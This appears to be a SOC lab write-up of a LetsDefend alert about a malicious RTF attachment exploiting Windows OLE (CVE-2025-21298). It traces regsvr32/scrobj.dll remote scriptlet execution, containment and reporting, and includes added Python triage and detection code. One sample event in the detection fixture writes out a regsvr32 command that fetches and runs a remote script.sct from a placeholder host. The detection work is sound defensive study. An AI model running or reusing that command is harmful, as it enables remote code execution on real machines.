# LetsDefend-SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298-
We are expected to investigate a critical alert reporting a Windows OLE zero-click RCE exploitation (CVE-2025-21298) delivered via a malicious RTF attachment.
## Investigation of the alert from LetsDefend
<img width="1380" height="1080" alt="Image" src="https://github.com/user-attachments/assets/f1137667-286f-460e-bce8-e86d54839888" /><br><br>
<p align="justify"> On 4 February 2025, at 16:18, a security alert was triggered following the receipt of an email by Austin @ letsdefend.io. The message originated from projectmanagement @ pm.me and included an attachment. The attached file was immediately flagged as malicious by the organisation’s security monitoring systems. This detection indicates that the attachment likely contained harmful content. </p>
## Email sent to Austin
<p align="justify"> This section investigates the project management email identified within the inbuilt email security system. The aim is to understand the nature of the email and the potential threats faced by the user. </p>
<p align="justify"> Upon examination, it is apparent that the email in question is malicious and designed as a phishing attempt. The email delivers a weaponised Rich Text Format (RTF) file, which is crafted to exploit a known vulnerability in Windows Object Linking and Embedding (OLE). </p>
<p align="justify"> The main objective of this attack is to achieve remote code execution on the target system. By exploiting the Windows OLE vulnerability, the attacker seeks to gain initial access to the system or potentially deliver additional payloads, increasing the risk to the recipient. </p>
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/15802c1d-b5a1-4e8f-b4d8-fe73ff6f7956" />
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/cc829f37-72cc-4aea-a3de-9efdbed6b9d9" />
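The delivery vector described above is an RTF document carrying an embedded OLE object. As an added triage example (not code from the original write-up), the following locates `\objclass`/`\objdata` groups in an RTF, decodes the hex blob and checks whether it carries an OLE2 compound-document header; the RTF it runs on is constructed inline, not the attachment from the alert.

```python
import re
import struct

# Magic bytes that open an OLE2 compound file, the container an embedded OLE
# object normally carries inside an RTF \objdata blob.
OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")

def build_sample_rtf():
    """Constructed sample, not the attachment from the alert: an RTF with one
    embedded object whose \\objdata wraps an OLE1 header around a payload that
    begins with the OLE2 compound-document magic."""
    class_name = b"Package\x00"
    inner = OLE2_MAGIC + b"\x00" * 56          # stand-in for a real CFB payload
    ole1 = (struct.pack("<III", 0x0501, 2, len(class_name)) + class_name
            + struct.pack("<III", 0, 0, len(inner)) + inner)
    return (r"{\rtf1\ansi Quarterly plan attached.\par"
            r"{\object\objemb{\*\objclass Package}"
            r"{\*\objdata " + ole1.hex() + "}}}")

def extract_ole_objects(rtf_text):
    """Return one record per \\objdata blob: declared class, decoded size and
    the offset of the OLE2 magic inside it (-1 if absent)."""
    classes = re.findall(r"\\\*\\objclass\s+([^}]+)", rtf_text)
    blobs = re.findall(r"\\\*\\objdata\s+([0-9A-Fa-f\s]+)", rtf_text)
    records = []
    for i, blob in enumerate(blobs):
        hexdata = re.sub(r"\s+", "", blob)
        payload = bytes.fromhex(hexdata[: len(hexdata) & ~1])  # drop odd nibble
        records.append({
            "objclass": classes[i].strip() if i < len(classes) else None,
            "size": len(payload),
            "ole2_offset": payload.find(OLE2_MAGIC),
        })
    return records

def triage(rtf_text):
    """Human-readable findings: any embedded OLE object in an emailed RTF
    warrants quarantine and a hash lookup; an OLE2 container inside it is
    the shape a weaponised document takes."""
    findings = []
    for o in extract_ole_objects(rtf_text):
        reason = "embedded OLE object ({})".format(o["objclass"] or "unknown class")
        if o["ole2_offset"] >= 0:
            reason += ", OLE2 container at offset {}".format(o["ole2_offset"])
        findings.append(reason)
    return findings
```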
---
<p align="justify"> The flagging of the IP address by these independent sources indicates a high likelihood of its involvement in suspicious or harmful operations. This consensus between security tools strengthens the case for treating the IP address as a potential threat within the environment. </p>
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/df322745-d20d-4335-bcfd-6883cf895952" />
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/14266f0e-7bad-4b94-ab3c-66dae851f19d" />
## Tracing Malicious Command Execution on Austin’s System
The command execution indicates that regsvr32.exe, a legitimate Windows utility, was leveraged to fetch and run a remote script from the attacker's side. The script was executed via the scrobj.dll library, a method frequently employed in fileless malware attacks, where malicious code runs directly in memory to evade conventional file-based detection mechanisms.
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/741271ad-6a03-4d6a-84db-089acd31e4bd" />
Upon further examination, it was determined that the request for the script originated from Austin's endpoint, meaning script.sct was being served and controlled from a remote server.
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/b3dae015-cb02-4c23-9d31-f787ea70df04" />
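The regsvr32/scrobj.dll pattern traced above is something a SOC can detect directly in process-creation telemetry. As an added example (not code from the original write-up), the following detection logic runs over constructed sample events: it flags regsvr32 loading scrobj.dll with a remote `/i:` argument and notes when the parent is an Office application; the hostnames, paths and the 203.0.113.10 address are constructed placeholders, not values from the alert.

```python
import re

# Constructed process-creation events, not the telemetry from the alert.
# The first mirrors the pattern seen on Austin's host: regsvr32 pulling a
# scriptlet (script.sct) from a remote server through scrobj.dll.
SAMPLE_EVENTS = [
    {"host": "austin-pc",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://203.0.113.10/script.sct scrobj.dll"},
    {"host": "austin-pc",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
    {"host": "austin-pc",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\austin\Downloads\plan.rtf"'},
]

OFFICE_APPS = ("winword", "excel", "powerpnt", "outlook")
# /i: pointing at a URL or UNC path means the "install" argument is remote.
REMOTE_INSTALL = re.compile(r"/i:\s*((?:https?|ftp)://\S+|\\\\\S+)", re.I)

def detect_regsvr32_remote_scriptlet(event):
    """Return a finding when regsvr32 loads scrobj.dll with a remote /i:
    argument (fileless scriptlet execution), else None."""
    if not event["image"].lower().endswith("regsvr32.exe"):
        return None
    cmd = event["cmdline"]
    remote = REMOTE_INSTALL.search(cmd)
    if "scrobj.dll" not in cmd.lower() or remote is None:
        return None
    reasons = ["regsvr32 loading scrobj.dll with a remote /i: argument"]
    parent = event.get("parent", "").lower()
    if any(app in parent for app in OFFICE_APPS):
        reasons.append("spawned by an Office application (document lure)")
    return {"host": event["host"], "url": remote.group(1), "reasons": reasons}

def scan(events):
    """Run the detection over a batch of events and return the findings."""
    return [f for f in map(detect_regsvr32_remote_scriptlet, events) if f]
```

A legitimate regsvr32 registering a local DLL (the second event) produces no finding, which keeps the rule usable on a busy host.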
## Hash on VirusTotal
I extended my analysis by examining the hash linked to the RTF file, which provided clear evidence that it was a malicious file. This hash had been flagged multiple times and identified by various security vendors, confirming its repeated use in malicious activity.
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/5220b9be-b064-4752-a06f-fd49d25591af" />
## Austin's computer contained
I proactively took the initiative to contain Austin's device in order to prevent any further damage or potential security risks. This prompt action helped to minimise the impact and maintain the safety of the network.
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/70cba92b-02df-4724-8754-9f107146dd5b" />
## Final Report
Upon completion of my investigation, I concluded that the file in question, or the malware associated with it, posed a significant threat. The analysis confirmed that the software was indeed harmful and required immediate attention.
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/8e304bc3-3b87-4468-9885-e33fde484739" />
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/567713aa-9428-4d22-ad0c-64cb2c9d96b0" />
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/b6894549-f02f-4865-9539-d8279097cbc7" />
## My notes
Afterwards, I documented my lessons learned from the incident for future reference and ensured all details regarding the malicious C2 attack were thoroughly communicated.
<img width="700" height="700" alt="Image" src="https://github.com/user-attachments/assets/56652cd6-273c-4cf9-9d7e-b65edb3f461d" />
<img width="700" height="700" alt="Image" src="https://github.com/user-attachments/assets/8e0ccc39-f3e3-4057-98a3-fc9abbe5a687" />
<img width="700" height="700" alt="Image" src="https://github.com/user-attachments/assets/11acace1-a0e5-4ea9-977e-a5de290cf3c2" />
<img width="700" height="700" alt="Image" src="https://github.com/user-attachments/assets/0c9af64a-fd02-4765-b215-b21c7d39b8cc" />
<img width="700" height="700" alt="Image" src="https://github.com/user-attachments/assets/c3391805-4984-438d-961b-5cb99162e302" />
Thank you very much for taking the time to read this!
Your feedback would be greatly valued and appreciated.